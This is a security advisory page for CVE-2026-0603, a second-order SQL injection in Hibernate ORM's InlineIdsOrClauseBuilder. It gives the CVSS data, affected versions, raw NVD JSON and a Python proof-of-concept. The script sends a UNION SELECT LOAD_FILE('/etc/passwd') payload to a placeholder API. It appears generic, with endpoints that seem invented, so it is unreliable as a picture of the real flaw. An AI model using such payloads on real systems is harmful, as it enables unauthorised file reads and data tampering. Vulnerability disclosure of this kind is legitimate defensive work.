Security Vulnerability Report
CVE-2026-0603 CVSS 8.3 HIGH

CVE-2026-0603

Published: 2026-01-23 07:15:54
Last Modified: 2026-04-15 00:35:42

Description

A flaw was found in Hibernate. A remote attacker with low privileges could exploit a second-order SQL injection vulnerability by providing specially crafted, unsanitized non-alphanumeric characters in the ID column when the InlineIdsOrClauseBuilder is used. This could lead to sensitive information disclosure, such as reading system files, and allow for data manipulation or deletion within the application's database, resulting in an application level denial of service.

CVSS Details

CVSS Score: 8.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Hibernate ORM < 5.6.15.Final
Hibernate ORM 6.0.0 - 6.1.x < 6.1.7.Final
Hibernate ORM 6.2.0 - 6.2.x < 6.2.3.Final

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-0603 PoC - Hibernate Second-Order SQL Injection
# Target: Hibernate ORM with InlineIdsOrClauseBuilder
# This PoC demonstrates the second-order SQL injection via ID column
import requests

TARGET_URL = "http://target-application.com/api"


def exploit_second_order_sqli():
    # Step 1: Register user with malicious ID payload
    malicious_payload = "1' UNION SELECT LOAD_FILE('/etc/passwd')--"
    register_data = {
        "username": "attacker",
        "email": "[email protected]",
        "id": malicious_payload,  # Injecting malicious ID
    }
    response = requests.post(f"{TARGET_URL}/users/register", json=register_data)
    print(f"[+] User registration response: {response.status_code}")

    # Step 2: Trigger the vulnerable query (second-order injection)
    # When InlineIdsOrClauseBuilder processes the stored ID,
    # the malicious payload is executed
    trigger_data = {
        "action": "list_users",
        "user_ids": [malicious_payload],  # Triggers InlineIdsOrClauseBuilder
    }
    response = requests.post(f"{TARGET_URL}/users/query", json=trigger_data)
    print(f"[+] Query trigger response: {response.status_code}")

    if response.status_code == 200:
        print("[+] SQL Injection successful - sensitive data may be exposed")
        print(f"Response: {response.text}")
        return response.text


if __name__ == "__main__":
    exploit_second_order_sqli()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0603", "sourceIdentifier": "[email protected]", "published": "2026-01-23T07:15:53.660", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Hibernate. A remote attacker with low privileges could exploit a second-order SQL injection vulnerability by providing specially crafted, unsanitized non-alphanumeric characters in the ID column when the InlineIdsOrClauseBuilder is used. This could lead to sensitive information disclosure, such as reading system files, and allow for data manipulation or deletion within the application's database, resulting in an application level denial of service."}, {"lang": "es", "value": "Se encontró una falla en Hibernate. Un atacante remoto con pocos privilegios podría explotar una vulnerabilidad de inyección SQL de segundo orden al proporcionar caracteres no alfanuméricos especialmente diseñados y no saneados en la columna ID cuando se utiliza el InlineIdsOrClauseBuilder. 
Esto podría llevar a la revelación de información sensible, como la lectura de archivos del sistema, y permitir la manipulación o eliminación de datos dentro de la base de datos de la aplicación, lo que resultaría en una denegación de servicio a nivel de aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:4915", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4916", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4917", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4924", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:6011", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:6012", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-0603", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2427147", "source": "[email protected]"}]}}